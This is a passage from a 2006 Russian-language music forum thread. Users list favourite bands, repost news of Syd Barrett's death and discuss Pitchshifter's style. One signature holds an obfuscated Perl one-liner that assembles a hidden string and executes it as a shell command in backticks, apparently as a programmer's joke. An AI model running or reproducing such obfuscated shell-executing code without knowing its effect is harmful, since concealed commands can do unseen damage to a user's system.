Bob Marley
Colors
The Doors
Enya
The Exploited
Clannad
Kittie
Nightwish
Nirvana
Red Hot Chili Peppers
Sex Pistols
Slipknot
System Of A Down
White Stripes
Гражданская Оборона
Егор и Опизденевшие
Коммунизм
Ольга Арефьева
Посев
спЛин
Янка Дягилева
а я ненавижу психею, еще с тех пор када рубль был рублём, и чё?)
Хм... любимая тактика максималистского юношества - обосрать и подтереться.
Ненависть - страшное слово. :twisted: Думай, когда его употребляешь. _________________ У нас вам тут не у вас....
korn,slipknot,soulfly,stigmata,#####,7раса,7000$............
долго перечислять, но в основном вышеперечисленное!
Про соад я не говорю, все итак понятно!
В последнее время помимо Соад - Scorpions часто, playcibo чуть пореже.
А так, частенько слушаю - The Art Of Noise (недавно для себя открыл. Своеобразный музон), Cardigans, Coldplay, Helloween, Moloko, Radiohead, queen, acdc. Ну вобщем дофига чего слушаю. И стилей разных. Это я так что первое вспомнилось, то и назвал.
На 61 году жизни скончался легендарный британский рок-музыкант Сид Барретт, который в 1965 году основал группу Pink Floyd. Причиной его смерти стали осложнения, вызванные последствиями заболевания диабетом. Как сообщил официальный представитель Пинк Флойд, Баррет "тихо умер пару дней назад". "Теперь состоятся частные семейные похороны", - уведомил он общественность.
Музыканты "Пинк Флойд" выступили по поводу кончины Баррета со специальным заявлением, в котором говорится: "Группа очень расстроена и опечалена смертью Сида Барретта". "Сид был направляющей силой в раннем составе группы и оставил наследие, которое продолжает вдохновлять". _________________ АЙС
Добавлено: Сб Июл 29, 2006 12:39 am Заголовок сообщения:
Lobzik писал(а):
Pitchshifter
это металкор или в каком приближенно стиле они играют? я слышал про них, что, неплохая банда мол, но скачать руки не доходят _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Июл 29, 2006 2:25 am Заголовок сообщения:
ALuserX писал(а):
Lobzik писал(а):
Pitchshifter
это металкор или в каком приближенно стиле они играют? я слышал про них, что, неплохая банда мол, но скачать руки не доходят
первые альбомы были тяжелым индастриалом,а потом группа стала играть в непонятном до сих пор стиле
они смешивают электронный стиль Jungle или D'n'B c ньюметаллом ну и другими стилями,местами музыка у них напоминает Prodigy,только с гитарами,и впинципе это неудивительно,так как ребята дружат с ними